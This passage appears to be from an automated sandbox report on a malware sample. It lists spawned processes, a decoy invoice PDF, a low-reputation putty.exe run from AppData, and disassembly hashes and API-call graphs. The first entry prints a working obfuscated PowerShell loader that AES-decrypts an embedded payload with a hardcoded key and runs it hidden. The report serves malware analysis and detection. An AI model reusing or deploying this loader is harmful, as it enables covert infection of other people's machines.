                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('21A646F03E7B8D0E0144FF5C4397D6E8768C751065483745F91BB8343AB048B2246E85D2C3339FCBD44E15DFB72AFC02B9734D6A198B8C26999F960E241B32E123B9CBACA3B2719C1372506CBCE2AA66A828088A6FB1394DB34D592155F83047EFCC0A4D824F80F7CF48D2BEF262BB9D33AEED76C583D7D150E7BAB97E9A8CFDF072921223BBAC8034DB6994987DC74DEDC903018518B3F35E6537D8A19790BD95F0143B2B4B7E734D48A2B7ACD50D6D344FCF97F4EE62251F59AFEEB9CFBEAC068B301CDE9B6205C120F731D96BC22D1FC31D8EFB7366A1B397C3FEACFF206D10806BD24C4B7E075E59E404FA575B579D4A6DF851FA02F116A2F66F789FA93583B7A924750A4FCAE28D9AC0876FEE6A97B56A1C444B74CD5A3658FF272917B31D6BFD3C6ECA76779B6869B431C03C81496AFFCDED8FCE4236FE3A29ABA4886BCA3096A535D941BDB706E590E88FA7706D01704C7206EA1993D9AEAE980BE84779168990E621B6CA14C201182FADBE2BAD9E4DAF1390F82E6E15665D552AC5D16E555E1A10FA71DB534F2319ED67A298283D9D1A1751E92A4FCFB4D31F6A93918C158BDD7EABEF8738964944F2614AD2E6956D5DE3967B3DFE771C9B3D9AC0461E1DE5472BAB55BE9C8660808B51C7080DFEFD889FEB39F30E08DCD5F153CA0E79A9BD1E25A9744BC9BA6F2D4AD161933BF97501242E37612D84B24A8C7848DDFBCC7A2C27BEFFF04E49DBBC9B8747A32D22D665A58E7B75BAF2BD3F1B99490F02F1CC81FE2EC80A4698AB32FD2AD22E0A57EB4582E03B221A46AB6F38B5479E296F8F998DD6D5168DDF6BE6B26968F1BFAC528412BB40BFA973A25189BF34F62AF88628E5760F282273BD9BFF02CDBBA4D63C85B6432A4E0D9E278E71C030FC7DEAAD08193692A80FB945629DE03029A101207C5F6CCD2F2A28646261EEEFE0C2884B1E19245881C7F4019F40A3E6A22A4E0B908C58233F10BB8BD8761D051FEFC7CA6830D169C4CDCFF33B2AD164977B0CED54F545F0020ECBB4EE24B26829657385A8DE80F60CBA5D6B36691DFEC61790CF77FE52269ED867DFA5120D6F6B6FB44CDFD99729B57B18279E84006C9697187CD589F4C6670B67313C0BC55D33B4D23D49761F9323E4B3E7611C1E68CCA7234F6AAAFCDF9910AF8D82BB84B2A607C63A8B87F5F13F7E8A604B1BA722BD0E876B85A74D8B1827EF22E424DBBD1EB3B2CB9EE6A38003CEA4C37D16615F536B1FFF4B129E5612763B59A74FF64B2E06055B8B24F5B5B7EC633F0335F3071091D7AD4106436C236007B291CF7A546785AA4B12C6C6132447EBA40F14CDC19ECBCEE70C975C7D8F0578F7FCAE5D8A2493C63EE1933513A538C7932C9E9C55084260FAE910DFE4190287225BA380E3F6B468905DB1E58629BB1A1B3C3296158A92830DA5112AF2F8E2277479FB9AFE52AB07C3BA644BDD75957ADB75241C6C23F95ACA7AF54F336FF6A8993C9D591E45CD5E243C46981298C82628286E0C5E331ACDD58AA74DFD318E226ABA7F7800F4A5F082919C70227FB9FC05B21083D3B9441D09666C4F983DFB7A8A821A080FF46F4A453A18A711C5EF4B13B318F99DE6427F6659F80C64D4FF6966E2F33DA9C9686F7E6CFD31D9E3D0AED7D73835A8C0C6222E3000D5F10C6285154E7086FF8EB7E9C110B4B86CE83C6F08FFF8D327680FE10400DA4CE7869DC78BCAD4DE74B35E05ED0B23917BD0F6A5851D6A5605D6BCB8EF5B938BB1527EE0A159BE7290D623181BFC96809099D314A1ECDB5BFB518599AB82C48092BA1049836D235A7F5883F1AC30CC53712246AF5F651DE0907D59DC5B745CBF1210DE92CDADEED7E1043B6C1F429DF3CC959506E3A55B17614E807E23F46A911829D400434C9681DBB6A3A2A0BC95862391FB8AD4E829AB55BB8430C0ECD752BB561057DE927805A181');$fcuYB = [System.Security.Cryptography.Aes]::Create();$fcuYB.Key = FwbFg('615241616D494A7A70714B63736F6771');$fcuYB.IV = New-Object byte[] 16;$uIvTQuuE = $fcuYB.CreateDecryptor();$TRZjYlWGC = $uIvTQuuE.TransformFinalBlock($JMNVEMgx, 0, $JMNVEMgx.Length);$xbgxJDMGJ = [System.Text.Encoding]::Utf8.GetString($TRZjYlWGC);$uIvTQuuE.Dispose();& $xbgxJDMGJ.Substring(0,3) $xbgxJDMGJ.Substring(3)
                    Imagebase:0x7ff6cb6b0000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:8
                    Start time:06:47:22
                    Start date:02/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6ee680000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:9
                    Start time:06:47:25
                    Start date:02/07/2024
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf"
                    Imagebase:0x7ff6e8200000
                    File size:5'641'176 bytes
                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    General

                    Target ID:10
                    Start time:06:47:26
                    Start date:02/07/2024
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                    Imagebase:0x7ff79c940000
                    File size:3'581'912 bytes
                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    General

                    Target ID:11
                    Start time:06:47:26
                    Start date:02/07/2024
                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1612,i,8777765815647240149,11795078331004045366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                    Imagebase:0x7ff79c940000
                    File size:3'581'912 bytes
                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    General

                    Target ID:12
                    Start time:06:47:29
                    Start date:02/07/2024
                    Path:C:\Users\user\AppData\Roaming\putty.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\AppData\Roaming\putty.exe"
                    Imagebase:0x7ff6785d0000
                    File size:1'663'264 bytes
                    MD5 hash:5EFEF6CC9CD24BAEEED71C1107FC32DF
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Antivirus matches:
                    • Detection: 0%, ReversingLabs
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Executed Functions

                      Function 0000023F9FCE0FA9 Relevance: .0, Instructions: 5COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000003.1780749027.0000023F9FCE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000023F9FCE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_3_23f9fce0000_mshta.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction ID: b3629e91c4070d69ed4a0c60f5fec3af22167740d9133970966d3793c6667f95
                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction Fuzzy Hash: 769002048D960655D45511D11D4939C50406388151FD588904417A0144D44D07A65192
                      Function 0000023F9FCE0FB9 Relevance: .0, Instructions: 5COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000003.1780749027.0000023F9FCE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000023F9FCE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_3_23f9fce0000_mshta.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction ID: b3629e91c4070d69ed4a0c60f5fec3af22167740d9133970966d3793c6667f95
                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction Fuzzy Hash: 769002048D960655D45511D11D4939C50406388151FD588904417A0144D44D07A65192
                      Function 0000023F9FCE0FB1 Relevance: .0, Instructions: 5COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000003.1780749027.0000023F9FCE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000023F9FCE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_3_23f9fce0000_mshta.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction ID: b3629e91c4070d69ed4a0c60f5fec3af22167740d9133970966d3793c6667f95
                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction Fuzzy Hash: 769002048D960655D45511D11D4939C50406388151FD588904417A0144D44D07A65192
                      Function 0000023F9FCE0FC1 Relevance: .0, Instructions: 5COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000003.1780749027.0000023F9FCE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000023F9FCE0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_3_23f9fce0000_mshta.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction ID: b3629e91c4070d69ed4a0c60f5fec3af22167740d9133970966d3793c6667f95
                      • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                      • Instruction Fuzzy Hash: 769002048D960655D45511D11D4939C50406388151FD588904417A0144D44D07A65192

                      Executed Functions

                      Function 00007FFB49B283C1 Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775325123.00007FFB49B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49b20000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: H
                      • API String ID: 0-2852464175
                      • Opcode ID: 3aec3d3eec9a234a90cb97ecc66295058529cd20185fbe9625aa89f205acb718
                      • Instruction ID: 7f894241a2bcb9363d4cfc19086f1f0403199f18f76dd3a61286844d2591ff45
                      • Opcode Fuzzy Hash: 3aec3d3eec9a234a90cb97ecc66295058529cd20185fbe9625aa89f205acb718
                      • Instruction Fuzzy Hash: 3AD18370A1CA4E8FDF95EF68C445AA97BF1FF68300F144169D449D7695CA34EC42CB81
                      Function 00007FFB49B266FB Relevance: .5, Instructions: 475COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775325123.00007FFB49B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49b20000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: af31815677304dd36b5c59ba6d51f41190a97d08229d6e19e836d59855bb6763
                      • Instruction ID: 6af5f979a67f385fe601a22d011e81950f68de4f205f56b1d473154b5e5905fd
                      • Opcode Fuzzy Hash: af31815677304dd36b5c59ba6d51f41190a97d08229d6e19e836d59855bb6763
                      • Instruction Fuzzy Hash: 1DE19371A0CA4E8FDB89EF6CC459AA977E1FF68300F14416AD409D7296CA35EC82C7C1
                      Function 00007FFB49BF4C9B Relevance: .5, Instructions: 465COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775900551.00007FFB49BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49bf0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4398242d1871be536f3e2bede7ddd4e008b5776155f14201354619fa2d8c8c54
                      • Instruction ID: 8b580b8a839eeaf38a40d64f60d9c5f71832d4fc2df5d3d03731765e6521e682
                      • Opcode Fuzzy Hash: 4398242d1871be536f3e2bede7ddd4e008b5776155f14201354619fa2d8c8c54
                      • Instruction Fuzzy Hash: 51E135B6A0DB4F4FE799EF38C8595B87BE2EF54310B1801BED44DC7596CA29AC068341
                      Function 00007FFB49B2712C Relevance: .5, Instructions: 464COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775325123.00007FFB49B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49b20000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 008366e0ada5c6ad07768574e5ad2e0fdc109b33c833a25ade94d118f38d7b47
                      • Instruction ID: 1d3d0040af418a30b782dc722f7904eae2b10b3366b183985bba31a6cb90d8f4
                      • Opcode Fuzzy Hash: 008366e0ada5c6ad07768574e5ad2e0fdc109b33c833a25ade94d118f38d7b47
                      • Instruction Fuzzy Hash: EBE19671A0C94E8FDB89EF6CC495AA977E1FFA8300F14416AD849D7295CA35FC42C781
                      Function 00007FFB49BF476E Relevance: .2, Instructions: 231COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775900551.00007FFB49BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49bf0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 69a4bb14404c123dcf2d4885682649527b88387e6c2b3c5d028016e74b758914
                      • Instruction ID: 6e172f1f5a6185ceaf63cd7013bae161149639cd03bee3d0557a3b4f3407f9e7
                      • Opcode Fuzzy Hash: 69a4bb14404c123dcf2d4885682649527b88387e6c2b3c5d028016e74b758914
                      • Instruction Fuzzy Hash: 966126A6A1EA8F0FE7A9FE7C892917966C3DF85250B5801BAD44DC79D6DC089C058381
                      Function 00007FFB49BF36FC Relevance: .2, Instructions: 203COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775900551.00007FFB49BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49bf0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4931bfb4244189f4f06dc402869a8057230879cac87528a5ea46f43dfe40787a
                      • Instruction ID: 5fcbc2ba54a6fd94b0862959ffc7ab4bf117deb1ba30ce2c1d957b25efcb8187
                      • Opcode Fuzzy Hash: 4931bfb4244189f4f06dc402869a8057230879cac87528a5ea46f43dfe40787a
                      • Instruction Fuzzy Hash: 4C5138D2A0EBCB0FE396AE7898641747FE1DF56660B1901FBD089C75D7E80C5C458392
                      Function 00007FFB49BF47BA Relevance: .1, Instructions: 148COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775900551.00007FFB49BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49bf0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5e373f8b89c1bfda7a53a5d38d6ff1050c2e2c94896d7aacaef69d94f94ef080
                      • Instruction ID: f6f4ffd99d9c19199b27e8614b8c40fbe3c4d52862f9a0dc00edb78543c91c5e
                      • Opcode Fuzzy Hash: 5e373f8b89c1bfda7a53a5d38d6ff1050c2e2c94896d7aacaef69d94f94ef080
                      • Instruction Fuzzy Hash: CD41F5DAE1EACF0BF3A9FE3C896917955C3DF92690B5801B9D44DC79D6DC089C094242
                      Function 00007FFB49B2545A Relevance: .1, Instructions: 59COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775325123.00007FFB49B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49b20000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89f26cf424b4e2072b57b9fd603bbc8fa547ea491b90500645647cd991bcbf62
                      • Instruction ID: 72a5343b6239779c287aaab2e4433688512b8d9112e6e3ec81c4f19d62cf4d1f
                      • Opcode Fuzzy Hash: 89f26cf424b4e2072b57b9fd603bbc8fa547ea491b90500645647cd991bcbf62
                      • Instruction Fuzzy Hash: F301497271CB058FD358EE1CA8851B577D1EB98330B14053EE4CAC3697E922E8438346
                      Function 00007FFB49B2834E Relevance: .0, Instructions: 50COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775325123.00007FFB49B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49b20000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c626c9dcea33e0d108ad5391e1e54b09cbf9a14cb21a10c15c20a68586c40ed2
                      • Instruction ID: 658f866f3be8d0c665fe10170bfa5239b60ad48328b2fe10c8cf621324407d8e
                      • Opcode Fuzzy Hash: c626c9dcea33e0d108ad5391e1e54b09cbf9a14cb21a10c15c20a68586c40ed2
                      • Instruction Fuzzy Hash: A2F09C7271CA094FD75CEE1CE44557473D1EB99311B10053EF48BC3696DD26E8478646
                      Function 00007FFB49B23A05 Relevance: .0, Instructions: 49COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775325123.00007FFB49B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49b20000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                      • Instruction ID: 32cde77e132f4efe12f5bc23ff859d22c0b90baf1b7ef8ce43cab9e0e2d7db5c
                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                      • Instruction Fuzzy Hash: 5A01677111CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC3651D636E892CB46
                      Function 00007FFB49B28363 Relevance: .0, Instructions: 40COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775325123.00007FFB49B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49B20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49b20000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 582b4049b824f7dac26a11579bfb6cf364f752f80a38f7f447e1886fdda4364e
                      • Instruction ID: 158c1cf91b4876e9fd2fc5a2a6c2700eb4dd625fb3970bbae0209f6e3512a542
                      • Opcode Fuzzy Hash: 582b4049b824f7dac26a11579bfb6cf364f752f80a38f7f447e1886fdda4364e
                      • Instruction Fuzzy Hash: 1FF0303275C6044FDB4CEA1CF8429B573D1EB99334B10066EE48BC2656D927E8478685
                      Function 00007FFB49BF04D8 Relevance: .0, Instructions: 30COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000007.00000002.1775900551.00007FFB49BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB49BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffb49bf0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d0295c5d3d63b64c708d4f20ba79b8c2209357a23d0e6f4a6ef38c8c6d6ed27b
                      • Instruction ID: ef2c89ae87a4bca8dc8d60894ee4ad7ed0d751fe63331fba5be81df38a6f9e56
                      • Opcode Fuzzy Hash: d0295c5d3d63b64c708d4f20ba79b8c2209357a23d0e6f4a6ef38c8c6d6ed27b
                      • Instruction Fuzzy Hash: 06E0DFB3E0ED2F1FABA5FEACA9591F86681EF54321B1801B7EA2CC3995DC009C104381

                      Execution Graph

                      Execution Coverage:2.9%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:47.1%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:55
                      execution_graph 86637 7ff6785d53e3 86638 7ff6785d53f7 memcpy_s 86637->86638 86737 7ff678611360 86638->86737 86641 7ff678611360 98 API calls 86642 7ff6785d541f 86641->86642 86643 7ff678611360 98 API calls 86642->86643 86644 7ff6785d545e 86643->86644 86645 7ff678611360 98 API calls 86644->86645 86646 7ff6785d5484 86645->86646 86647 7ff6785d54da GetDesktopWindow GetClientRect 86646->86647 86648 7ff6785d54a1 GetMonitorInfoA 86646->86648 86650 7ff6785d54ee 86647->86650 86648->86650 86749 7ff678612900 135 API calls 86650->86749 86652 7ff6785d553e 86750 7ff678612900 135 API calls 86652->86750 86654 7ff6785d554d 86751 7ff678612900 135 API calls 86654->86751 86656 7ff6785d5560 86752 7ff6786112a0 98 API calls swprintf 86656->86752 86658 7ff6785d5578 86659 7ff678611360 98 API calls 86658->86659 86660 7ff6785d5595 86659->86660 86753 7ff6786112a0 98 API calls swprintf 86660->86753 86662 7ff6785d55ba 86754 7ff6786112a0 98 API calls swprintf 86662->86754 86664 7ff6785d55d5 86755 7ff6785d1080 138 API calls swprintf 86664->86755 86666 7ff6785d55ed CreateWindowExW 86667 7ff6785d5655 86666->86667 86668 7ff6785d5639 GetLastError 86666->86668 86670 7ff6785d56d0 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 86667->86670 86673 7ff6785d567d MonitorFromWindow 86667->86673 86756 7ff678617ad0 134 API calls 2 library calls 86668->86756 86671 7ff6785d5717 86670->86671 86758 7ff6785d6080 188 API calls 2 library calls 86671->86758 86672 7ff6785d5646 86757 7ff6785d6000 134 API calls 86672->86757 86677 7ff6785d569f 86673->86677 86676 7ff6785d572a 86759 7ff6786134f0 86676->86759 86677->86670 86677->86671 86681 7ff6785d579f 86682 7ff6785d57d2 86681->86682 86765 7ff67869b8ac 98 API calls 4 library calls 86681->86765 86766 7ff6786112a0 98 API calls swprintf 86682->86766 86685 7ff6785d57e9 86686 7ff678611360 98 API calls 86685->86686 86687 7ff6785d5815 86686->86687 86767 7ff6785fc600 134 API calls 86687->86767 86689 7ff6785d583e 86690 7ff678611360 98 API calls 86689->86690 86691 7ff6785d5865 86690->86691 86692 7ff678611360 98 API calls 86691->86692 86693 7ff6785d5878 86692->86693 86694 7ff678611360 98 API calls 86693->86694 86695 7ff6785d588b 86694->86695 86768 7ff6785e1330 142 API calls 86695->86768 86697 7ff6785d589f GetWindowRect GetClientRect 86698 7ff678611360 98 API calls 86697->86698 86699 7ff6785d58d7 SetWindowPos 86698->86699 86700 7ff6786134f0 134 API calls 86699->86700 86701 7ff6785d599d memcpy_s 86700->86701 86702 7ff6785d59ad CreateBitmap 86701->86702 86769 7ff678613590 86702->86769 86706 7ff6785d5af5 86707 7ff6785d5b00 DeleteMenu 86706->86707 86707->86707 86708 7ff6785d5b15 86707->86708 86709 7ff6785d5b71 AppendMenuA 86708->86709 86710 7ff6785d5b30 AppendMenuA 86708->86710 86714 7ff6785d5b90 86709->86714 86710->86710 86711 7ff6785d5b6c 86710->86711 86711->86709 86711->86714 86712 7ff678611360 98 API calls 86712->86714 86714->86712 86715 7ff6785d5d42 86714->86715 86795 7ff678612890 86714->86795 86716 7ff6785d5d4b 86715->86716 86800 7ff6785d69c0 138 API calls swprintf 86716->86800 86718 7ff6785d5d73 GetKeyboardLayout GetLocaleInfoA 86801 7ff67869cb74 62 API calls _invalid_parameter_noinfo 86718->86801 86720 7ff6785d5da2 ShowWindow SetForegroundWindow GetForegroundWindow 86802 7ff6785e9b60 140 API calls 86720->86802 86722 7ff6785d5de2 UpdateWindow 86736 7ff6785d5e09 86722->86736 86723 7ff6785d5e41 PeekMessageA 86724 7ff6785d5e60 GetForegroundWindow 86723->86724 86723->86736 86803 7ff6785e9b60 140 API calls 86724->86803 86727 7ff6785d5e86 MsgWaitForMultipleObjects 86727->86736 86729 7ff6785d5ed7 PeekMessageW 86729->86736 86730 7ff6785d5f1f 86806 7ff6785d6bd0 134 API calls 86730->86806 86732 7ff6785d5f03 IsWindow 86734 7ff6785d5ec0 DispatchMessageW 86732->86734 86735 7ff6785d5f10 IsDialogMessageA 86732->86735 86734->86736 86735->86736 86736->86723 86736->86729 86736->86730 86736->86732 86736->86734 86804 7ff6785fcf90 134 API calls 86736->86804 86805 7ff6785fd060 98 API calls 86736->86805 86738 7ff67861138b 86737->86738 86739 7ff6786113a4 86737->86739 86826 7ff67869b8ac 98 API calls 4 library calls 86738->86826 86740 7ff6786113ca 86739->86740 86827 7ff67869b8ac 98 API calls 4 library calls 86739->86827 86807 7ff6786157e0 86740->86807 86745 7ff6786113ff 86817 7ff67868a9f0 86745->86817 86749->86652 86750->86654 86751->86656 86752->86658 86753->86662 86754->86664 86755->86666 86756->86672 86758->86676 86761 7ff6786134ff 86759->86761 86763 7ff6785d574a 86761->86763 86837 7ff67864a910 134 API calls 86761->86837 86764 7ff6785e0820 144 API calls 86763->86764 86764->86681 86765->86682 86766->86685 86767->86689 86768->86697 86770 7ff6785d59df 8 API calls 86769->86770 86771 7ff67860c930 86770->86771 86772 7ff67860c943 86771->86772 86775 7ff67860c97e 86771->86775 86838 7ff678613bc0 86772->86838 86775->86706 86778 7ff67860c9f1 86852 7ff678612ba0 8 API calls swprintf 86778->86852 86781 7ff67860c9e9 86851 7ff67860cc40 RegCloseKey 86781->86851 86784 7ff67860c9bd 86784->86781 86849 7ff678612ba0 8 API calls swprintf 86784->86849 86850 7ff67860d100 135 API calls 86784->86850 86785 7ff6786134f0 134 API calls 86788 7ff67860ca71 86785->86788 86787 7ff67860c954 86787->86785 86794 7ff67869f3e2 86788->86794 86853 7ff67869a688 11 API calls memcpy_s 86788->86853 86790 7ff67869f3d7 86854 7ff6786a45fc 59 API calls _invalid_parameter_noinfo 86790->86854 86792 7ff67868a9f0 swprintf 8 API calls 86793 7ff67869f7a0 86792->86793 86793->86706 86794->86792 86865 7ff678612710 86795->86865 86798 7ff67868a9f0 swprintf 8 API calls 86799 7ff6786128ef 86798->86799 86799->86714 86800->86718 86801->86720 86802->86722 86803->86736 86804->86727 86808 7ff678615808 86807->86808 86809 7ff678615869 86807->86809 86829 7ff6786155b0 86808->86829 86833 7ff67869b8ac 98 API calls 4 library calls 86809->86833 86812 7ff678615865 86813 7ff67868a9f0 swprintf 8 API calls 86812->86813 86815 7ff6786113de 86813->86815 86814 7ff67861582d 86814->86812 86816 7ff6786155b0 98 API calls 86814->86816 86815->86745 86828 7ff67869b8ac 98 API calls 4 library calls 86815->86828 86816->86814 86819 7ff67868a9f9 86817->86819 86818 7ff6785d5408 86818->86641 86819->86818 86820 7ff67868aac0 IsProcessorFeaturePresent 86819->86820 86821 7ff67868aad8 86820->86821 86835 7ff67868ac04 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 86821->86835 86823 7ff67868aaeb 86836 7ff67868ac78 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 86823->86836 86826->86739 86827->86740 86828->86745 86830 7ff6786155c3 86829->86830 86832 7ff6786155cf 86829->86832 86830->86832 86834 7ff67869b8ac 98 API calls 4 